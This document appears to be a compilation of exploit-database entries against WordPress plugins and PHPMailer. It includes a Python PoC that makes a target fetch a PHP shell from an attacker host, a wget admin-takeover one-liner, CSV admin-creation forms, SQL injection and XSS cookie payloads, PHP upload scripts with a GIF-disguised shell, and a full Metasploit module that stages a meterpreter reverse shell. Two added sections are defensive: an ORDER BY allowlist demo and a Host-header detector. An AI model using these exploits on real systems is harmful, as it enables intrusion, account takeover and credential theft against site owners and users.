Title: WP Pixabay Images Multiple Vulnerabilities
Product: Pixabay Images (WordPress Plugin)
Affected versions: 2.3
Impact: high
Remote: yes
Product link: https://wordpress.org/plugins/pixabay-images/
Reported: 14/01/2015
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
Vendor's Description of the Software:
----------------------------------------------------------------------
Pixabay Images is a WordPress plugin that lets you pick CC0 public
domain pictures from Pixabay and insert them with just a click anywhere
on your blog. The images are safe to use, and paying attribution or
linking back to the source is not required.
Business recommendation:
----------------------------------------------------------------------
Update to version 2.4
Vulnerability description:
----------------------------------------------------------------------
1) Authentication bypass
The plugin does not correctly check whether the user is logged in, so
certain code paths can be reached without authentication.
2) Arbitrary file upload
The plugin does not validate the host in the provided download URL, so
the server can be made to fetch and store arbitrary files, including PHP code.
3) Path Traversal
Certain values are not sanitized before they are used in a file operation,
which allows files to be stored outside of the "download" folder.
4) Cross Site Scripting (XSS)
The generated author link uses unsanitized user values, which can be
abused for Cross Site Scripting (XSS) attacks.
Proof of concept:
----------------------------------------------------------------------
The following PoC Python script chains issues 1 to 3: without authentication it
makes the target fetch a PHP file from an attacker-controlled host and store it
outside the download folder.
#!/usr/bin/env python3
import argparse
import http.client
import urllib.parse
from urllib.parse import urlparse


def exploit(target_url, shellcode_url):
    target = urlparse(target_url)
    # 'q' carries the path traversal, so the fetched file lands outside the download folder
    params = urllib.parse.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url,
                                     'image_user': 'none', 'q': 'xxx/../../../../../../mogwai'})
    headers = {"Content-type": "application/x-www-form-urlencoded"}
    print("[+] Sending download request....")
    conn = http.client.HTTPConnection(target.netloc)
    conn.request("POST", target.path.rstrip("/") + "/wp-admin/", params, headers)
    response = conn.getresponse()
    response_data = response.read().decode("utf-8", errors="replace")
    # as in the original: only a non-200 answer that is not the expected metadata error counts as failure
    if response.status != 200 and response_data != "Error: File attachment metadata error":
        print("[-] Something went wrong")
        print(response_data)
        exit()
    conn.close()


# ---- Main code ----------------
parser = argparse.ArgumentParser()
parser.add_argument("target_url", help="The target url, for example http://foo.bar/blog/")
parser.add_argument("shellcode_url",
                    help="The url of the PHP file that should be uploaded, for example: http://attacker.com/shell.php")
print("----------------------------------------------")
print(" pixabay upload wordpress plugin exploit PoC")
print(" Mogwai security")
print("----------------------------------------------")
arguments = parser.parse_args()
exploit(arguments.target_url, arguments.shellcode_url)
Vulnerable / tested versions:
----------------------------------------------------------------------
Pixabay Images 2.3
Disclosure timeline:
----------------------------------------------------------------------
14/01/2015: Reporting issues to the plugin author
15/01/2015: Release of fixed version (2.4)
19/01/2015: Public advisory
Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab
----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)
info@mogwaisecurity.de
# Exploit Title: WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/plugins/pie-register/
# Date: 08.10.2021
# Exploit Author: Lotfi13-DZ
# Vendor Homepage: https://wordpress.org/plugins/pie-register/
# Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
# Version: <= 3.7.1.4
# Tested on: ubuntu
Vulnerable arg: [user_id_social_site=1] <== the social-login handler issues the authentication cookies for user 1 (the admin) without a valid password.
Exploit: wget -q -S -O - http://localhost/ --post-data 'user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null' > /dev/null
The -S flag prints the response headers, so the issued wordpress_logged_in_* cookies show up in the Set-Cookie lines while the page body is discarded.
# Exploit Title: Pie Register 2.0.13 Privilege escalation
# Date: 16-10-2014
# Software Link: https://wordpress.org/plugins/pie-register/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-8802
# Category: webapps
1. Description
Anyone can import a CSV file without authentication; Pie Register creates the users listed in it, including accounts with the administrator role.
File: pie-register\pie-register.php
add_action( 'init', array($this,'pie_main') );
function pie_main() {
// I skip unnecessary lines
if(isset($_FILES['csvfile']['name'])) {
$this->importUsers();
}
}
http://security.szurek.pl/pie-register-2013-privilege-escalation.html
2. Proof of Concept
Create CSV file based on given example:
"Username","Display name","E-mail","User Registered","First Name","Last Name","Nickname","Role"
"hack","Hacked","hacked@hacked.hacked","2010-10-10 20:00:00","Hacked","Hacked","Hacked","administrator"
Import account using:
<form method="post" action="http://wordpress-instalation" enctype="multipart/form-data">
Input CSV<input type="file" name="csvfile">
<input type="submit" value="Add user!">
</form>
Create another standard account using wp-login.php?action=register.
After login go to wp-admin/profile.php and search "uid" in page source.
Number after "uid" is our current account id. For example: "uid":"123".
The admin account imported earlier was created before ours, so its id is lower: typically id-1, or more generally id-x for some small positive x.
We can activate this account using:
<form method="post" action="http://wordpress-instalation">
<input type="hidden" name="verifyit" value="1">
Account id:<input type="text" name="vusers[]" value="">
<input type="submit" value="Activate user!">
</form>
Finally we can reset password using: http://wordpress-instalation/wp-login.php?action=lostpassword
3. Solution:
Update to version 2.0.14
https://downloads.wordpress.org/plugin/pie-register.2.0.14.zip
# Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
# Author: Manuel García Cárdenas
# Date: 2018-05-10
# Software: WordPress Plugin Pie Register 3.0.9
# CVE: CVE-2018-10969
# I. VULNERABILITY
# WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection
# II. BACKGROUND
# Pie-Register is a quick and easy way to brand your Registration Pages on
# WordPress sites.
# III. DESCRIPTION
# The bug is in /pie-register/classes/invitation_code_pagination.php:
#     if ( isset( $_GET['order'] ) && $_GET['order'] )
#         $order = $_GET['order'];
#     ...
#     $this->order = esc_sql( $order );
# The "order" parameter is only passed through esc_sql(), which escapes quotes
# for use inside a quoted string literal. In an unquoted ORDER BY clause that
# offers no protection, so the value reaches the query effectively unsanitized.
# IV. PROOF OF CONCEPT
# The following requests have been confirmed to suffer from time-based SQL injection
# (observed response time in parentheses):
GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc HTTP/1.1 (original)
GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a) HTTP/1.1 (2 seconds of response)
GET /wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a) HTTP/1.1 (30 seconds of response)
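The lesson of this advisory is that escaping is the wrong tool for a sort parameter: esc_sql() rewrites quotes, and the payload above contains none, so it passes through unchanged into a clause where the database expects identifiers and expressions, which cannot be bound as query parameters either. The following is an added example, not plugin code, that reproduces this in SQLite: esc_sql() is a re-implementation of what the WordPress function does to a string, the table and rows are constructed, and because SQLite has no sleep() the blind oracle flips the sort direction instead of delaying the response. The allowlist in list_codes_safe() is the fix that actually works for ORDER BY.

```python
"""ORDER BY injection that esc_sql() cannot stop, reproduced in SQLite.

Added example, not plugin code. The table and rows are constructed, esc_sql()
re-implements what WordPress's function does to a string, and the query
builder follows the shape of the pagination class: user-controlled
orderby/order values placed after ORDER BY.
"""
import sqlite3

ALLOWED_ORDERBY = {"name", "code"}   # assumed column allowlist for the demo
ALLOWED_ORDER = {"asc", "desc"}


def esc_sql(value: str) -> str:
    """Backslash-escape quotes and backslashes, as esc_sql() does.
    That only matters inside a quoted string literal; ORDER BY takes bare
    identifiers and expressions, so a payload without quotes passes untouched."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def make_db() -> sqlite3.Connection:
    # Constructed data standing in for the invitation-code table.
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE invitation_codes (name TEXT, code TEXT);
        INSERT INTO invitation_codes VALUES ('alpha', 'A1'), ('beta', 'B2'), ('gamma', 'C3');
        """
    )
    return con


def list_codes_vulnerable(con: sqlite3.Connection, orderby: str, order: str) -> list:
    # Same shape as the plugin: escaped, then concatenated into the clause.
    sql = "SELECT name FROM invitation_codes ORDER BY " + esc_sql(orderby) + " " + esc_sql(order)
    return [row[0] for row in con.execute(sql)]


def list_codes_safe(con: sqlite3.Connection, orderby: str, order: str) -> list:
    # Identifiers and keywords cannot be bound as parameters; allowlist them.
    if orderby not in ALLOWED_ORDERBY or order.lower() not in ALLOWED_ORDER:
        raise ValueError(f"rejected sort parameters {orderby!r} {order!r}")
    sql = f"SELECT name FROM invitation_codes ORDER BY {orderby} {order.lower()}"
    return [row[0] for row in con.execute(sql)]


def blind_oracle(con: sqlite3.Connection, condition_sql: str) -> bool:
    """Boolean-blind inference through the orderby parameter: when the
    condition is true the CASE yields each row's name and the list comes back
    descending; when false every key is NULL and the tie-breaker sorts ascending.
    The advisory's PoC uses sleep() in the order parameter to the same end."""
    orderby = f"(case when {condition_sql} then name end) desc, name"
    rows = list_codes_vulnerable(con, orderby, "asc")
    return rows == sorted(rows, reverse=True)


if __name__ == "__main__":
    con = make_db()
    probe = "(select count(*) from sqlite_master) = 1"
    print("esc_sql leaves the payload intact:", esc_sql(probe) == probe)
    print("exactly one table in the schema?", blind_oracle(con, probe))
    print("exactly two tables in the schema?", blind_oracle(con, "(select count(*) from sqlite_master) = 2"))
    try:
        list_codes_safe(con, "(select 1)", "desc")
    except ValueError as exc:
        print("allowlist rejected:", exc)
```

The same allowlist approach covers any other place a request parameter selects a column, table or keyword; WordPress's own sanitize_sql_orderby() exists for exactly this case.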
# V. SYSTEMS AFFECTED
# Pie Register <= 3.0.9
# VI. DISCLOSURE TIMELINE
# May 10, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
# May 10, 2018 2: Send to vendor without response
# June 05, 2018 3: Second email to vendor without response
# June 11, 2018 4: Send to the Full-Disclosure lists
# VII. Solution
# Disable plugin until a fix is available
source: https://www.securityfocus.com/bid/61140/info
Pie Register plugin for WordPress is prone to multiple cross-site scripting vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Pie Register 1.30 is vulnerable; other versions may also be affected.
The vulnerable code echoes the pass1 and pass2 POST parameters back into the page unescaped:
<?php echo $_POST['pass1'];?>
<?php echo $_POST['pass2'];?>
* Exploit Title: Wordpress Plugin PicUploader 1.0 - Remote File Upload
* Google Dork: N/A
* Date: 2020.03.22
* Exploit Author: Milad Karimi
* Vendor Homepage: https://github.com/xiebruce/PicUploader
* Software Link: https://github.com/xiebruce/PicUploader
* Category : webapps
* Version: 1.0
* Tested on: windows 10 , firefox
* CVE : N/A
Vulnerable Source (line numbers as given in the original advisory, in order):
24: define('APP_PATH', strtr(__DIR__, '\\', '/'));
72: $_FILES['file'] = $_FILES[$plugin];
80: if(isset($_FILES['file']) && $files = $_FILES['file'])
81: $tmpDir = APP_PATH . '/.tmp';
84: if(is_array($files['tmp_name']))
86: foreach($files['tmp_name'] as $key=>$tmp_name)
87: $dest = $tmpDir . '/' . $files['name'][$key];
88: move_uploaded_file($tmp_name, $dest))
The client-supplied file name is used unchanged for $dest; nothing checks the extension.
Exploit:
<?php
$shahab = "file.jpg";
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/PicUploader-master/index.php");
curl_setopt($ch, CURLOPT_POST, true);
// CURLFile replaces the deprecated "@filename" form, which PHP 7 no longer accepts
curl_setopt($ch, CURLOPT_POSTFIELDS, array('zip' => new CURLFile($shahab)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
Location File:
http://localhost/wordpress/wp-content/plugins/PicUploader/file.jpg
source: https://www.securityfocus.com/bid/53894/info
Picturesurf Gallery plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Picturesurf Gallery 1.2 is vulnerable; other versions may also be affected.
PostShell.php
<?php
$uploadfile = "lo.php.gif";
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// CURLFile replaces the deprecated "@filename" form, which PHP 7 no longer accepts
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => new CURLFile($uploadfile),
          'is_simple' => 'is_simple'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/data/upload/lo.php.gif
lo.php.gif (starts with the GIF89a magic bytes, binary header bytes omitted here, followed by the PHP payload):
GIF89a
<?php
phpinfo();
?>
# Exploit Title: WordPress Plugin Picture Gallery 1.4.2 - 'Edit Content URL' Stored Cross-Site Scripting (XSS)
# Date: 2021-08-06
# Exploit Author: Aryan Chehreghani
# Software Link: https://wordpress.org/plugins/picture-gallery/
# Version: 1.4.2
# Tested on: Windows 10
How to Reproduce this Vulnerability:
1. Install WordPress 5.8
2. Install and activate Picture Gallery - Frontend Image Uploads, AJAX Photo List
3. Navigate to admin menu wrap >> Picture Gallery >> Options >> Access Control Tab >> enter the XSS payload into the Edit Content URL input field.
4. Click Save Changes.
5. The payload is stored in the database; when the same page is loaded again the JavaScript executes and the alert pops up.
6. Payload Used: "><script>alert(document.cookie)</script>
# # # # #
# Exploit Title: WordPress Plugin PICA Photo Gallery v1.0 - SQL Injection
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: https://www.apptha.com/
# Software: https://www.apptha.com/category/extension/Wordpress/PICA-Photo-Gallery
# Demo: http://www.apptha.com/demo/pica-photo-gallery
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?aid=[SQL]
# For example;
# -3+/*!50000union*/+select+0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,2,3,@@version--+-
# wpapptha_term_relationships,wpapptha_term_taxonomy,wpapptha_terms,wpapptha_usermeta,wpapptha_users
# Etc..
# # # # #
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'WordPress PHPMailer Host Header Command Injection',
      'Description' => %q{
        This module exploits a command injection vulnerability in WordPress
        version 4.6 with Exim as an MTA via a spoofed Host header to PHPMailer,
        a mail-sending library that is bundled with WordPress.

        A valid WordPress username is required to exploit the vulnerability.
        Additionally, due to the altered Host header, exploitation is limited to
        the default virtual host, assuming the header isn't mangled in transit.

        If the target is running Apache 2.2.32 or 2.4.24 and later, the server
        may have HttpProtocolOptions set to Strict, preventing a Host header
        containing parens from passing through, making exploitation unlikely.
      },
      'Author' => [
        'Dawid Golunski', # Vulnerability discovery
        'wvu'             # Metasploit module
      ],
      'References' => [
        ['CVE', '2016-10033'],
        ['URL', 'https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html'],
        ['URL', 'http://www.exim.org/exim-html-current/doc/html/spec_html/ch-string_expansions.html'],
        ['URL', 'https://httpd.apache.org/docs/2.4/mod/core.html#httpprotocoloptions']
      ],
      'DisclosureDate' => 'May 3 2017',
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => [ARCH_X86, ARCH_X64],
      'Privileged' => false,
      'Targets' => [
        ['WordPress 4.6 / Exim', {}]
      ],
      'DefaultTarget' => 0,
      'DefaultOptions' => {
        'PAYLOAD' => 'linux/x64/meterpreter_reverse_https',
        'CMDSTAGER::FLAVOR' => 'wget'
      },
      'CmdStagerFlavor' => ['wget', 'curl']
    ))

    register_options([
      OptString.new('USERNAME', [true, 'WordPress username', 'admin'])
    ])

    register_advanced_options([
      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
    ])

    deregister_options('VHOST', 'URIPATH')
  end

  def check
    if (version = wordpress_version)
      version = Gem::Version.new(version)
    else
      return CheckCode::Safe
    end

    vprint_status("WordPress #{version} installed at #{full_uri}")

    if version <= Gem::Version.new('4.6')
      CheckCode::Appears
    else
      CheckCode::Detected
    end
  end

  def exploit
    if check == CheckCode::Safe
      print_error("Is WordPress installed at #{full_uri} ?")
      return
    end

    # Since everything goes through strtolower(), we need lowercase
    print_status("Generating #{cmdstager_flavor} command stager")
    @cmdstager = generate_cmdstager(
      'Path'    => "/#{Rex::Text.rand_text_alpha_lower(8)}",
      :temp     => datastore['WritableDir'],
      :file     => File.basename(cmdstager_path),
      :nospace  => true
    ).join(';')

    print_status("Generating and sending Exim prestager")
    generate_prestager.each do |command|
      vprint_status("Sending #{command}")
      send_request_payload(command)
    end
  end

  #
  # Exploit methods
  #

  # Absolute paths are required for prestager commands due to execve(2)
  def generate_prestager
    prestager = []

    # This is basically sh -c `wget` implemented using Exim string expansions
    # Badchars we can't encode away: \ for \n (newline) and : outside strings
    prestager << '/bin/sh -c ${run{/bin/echo}{${extract{-1}{$value}' \
                 "{${readsocket{inet:#{srvhost_addr}:#{srvport}}" \
                 "{get #{get_resource} http/1.0$value$value}}}}}}"

    # CmdStager should rm the file, but it blocks on the payload, so we do it
    prestager << "/bin/rm -f #{cmdstager_path}"
  end

  def send_request_payload(command)
    res = send_request_cgi(
      'method'  => 'POST',
      'uri'     => wordpress_url_login,
      'headers' => {
        'Host' => generate_exim_payload(command)
      },
      'vars_get' => {
        'action' => 'lostpassword'
      },
      'vars_post' => {
        'user_login'  => datastore['USERNAME'],
        'redirect_to' => '',
        'wp-submit'   => 'Get New Password'
      }
    )

    if res && !res.redirect?
      if res.code == 200 && res.body.include?('login_error')
        fail_with(Failure::NoAccess, 'WordPress username may be incorrect')
      elsif res.code == 400 && res.headers['Server'] =~ /^Apache/
        fail_with(Failure::NotVulnerable, 'HttpProtocolOptions may be Strict')
      else
        fail_with(Failure::UnexpectedReply, "Server returned code #{res.code}")
      end
    end

    res
  end

  def generate_exim_payload(command)
    exim_payload = Rex::Text.rand_text_alpha(8)
    exim_payload << "(#{Rex::Text.rand_text_alpha(8)} "
    exim_payload << "-be ${run{#{encode_exim_payload(command)}}}"
    exim_payload << " #{Rex::Text.rand_text_alpha(8)})"
  end

  # We can encode away the following badchars using string expansions
  def encode_exim_payload(command)
    command.gsub(/[\/ :]/,
      '/' => '${substr{0}{1}{$spool_directory}}',
      ' ' => '${substr{10}{1}{$tod_log}}',
      ':' => '${substr{13}{1}{$tod_log}}'
    )
  end

  #
  # Utility methods
  #

  def cmdstager_flavor
    datastore['CMDSTAGER::FLAVOR']
  end

  def cmdstager_path
    @cmdstager_path ||=
      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}"
  end

  #
  # Override methods
  #

  # Return CmdStager on first request, payload on second
  def on_request_uri(cli, request)
    if @cmdstager
      print_good("Sending #{@cmdstager}")
      send_response(cli, @cmdstager)
      @cmdstager = nil
    else
      print_good("Sending payload #{datastore['PAYLOAD']}")
      super
    end
  end
end
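The module's generate_exim_payload builds a Host header of the form name(name -be ${run{...}} name), which is why the description notes that Apache's HttpProtocolOptions Strict (a Host header with parentheses fails the grammar and gets a 400) blocks it. The same observation gives a defender a detection rule: a Host header that is not a syntactically valid host[:port] or IP literal is anomalous on its own, and one containing Exim expansion syntax is a direct indicator. The following is an added example, not part of the Metasploit module, that applies that check to constructed Apache access-log lines whose last field is the Host header (as with a %{Host}i field in a custom LogFormat); helper names and the log lines are constructed.

```ruby
# Hypothetical helpers (added example, not the Metasploit module's code).

# RFC 1123 hostname labels (optionally ending in a dot) or a bracketed IP
# literal, with an optional :port. Anything outside this grammar is suspicious.
VALID_HOST_RE = /\A(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*\.?|\[[0-9a-f:.]+\])(?::\d{1,5})?\z/i

# Tokens that only make sense in a Host header if someone is feeding it to an
# MTA: Exim string-expansion braces, the -be (expansion test) switch, and the
# parentheses the PHPMailer injection needs to wrap the sender address.
EXIM_EXPANSION_MARKERS = ['${', '-be', '(', ')'].freeze

# Returns nil for a well-formed host, otherwise a hash describing the anomaly.
def host_header_anomaly(host)
  return nil if host.to_s.match?(VALID_HOST_RE)
  markers = EXIM_EXPANSION_MARKERS.select { |m| host.to_s.include?(m) }
  { host: host.to_s, markers: markers, exim_expansion: host.to_s.include?('${') }
end

# Constructed log lines: a normal password-reset POST, one carrying a Host
# header shaped like the module's payload (command replaced by PLACEHOLDER),
# and one that is merely malformed.
LOG_LINES = <<~LOG
  198.51.100.7 - - [03/May/2017:12:00:01 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 - "www.example.com"
  198.51.100.7 - - [03/May/2017:12:00:09 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 - "abcdefgh(ijklmnop -be ${run{PLACEHOLDER}} qrstuvwx)"
  198.51.100.7 - - [03/May/2017:12:00:15 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 400 - "host with space"
LOG

# Walk the log and report every request whose Host header fails the grammar,
# together with the request URI and the status the server returned (a 400 here
# is what HttpProtocolOptions Strict produces; a 302 means the header got through).
def scan_host_headers(log)
  log.each_line.with_object([]) do |line, alerts|
    stripped = line.strip
    host_m = stripped.match(/"([^"]*)"\z/)
    req_m  = stripped.match(%r{"(?:GET|POST) (\S+) HTTP/})
    next unless host_m && req_m
    anomaly = host_header_anomaly(host_m[1])
    next unless anomaly
    alerts << anomaly.merge(uri: req_m[1], status: stripped[/" (\d{3}) /, 1])
  end
end

if __FILE__ == $PROGRAM_NAME
  scan_host_headers(LOG_LINES).each do |a|
    flag = a[:exim_expansion] ? 'EXIM EXPANSION' : 'malformed host'
    puts "#{flag}: #{a[:uri]} status=#{a[:status]} host=#{a[:host].inspect} markers=#{a[:markers].inspect}"
  end
end
```

Pairing this with the request path is what makes it useful: a malformed Host header on wp-login.php?action=lostpassword that received a 302 rather than a 400 means the password-reset mail was generated with the attacker-controlled sender address, which is the condition the module relies on.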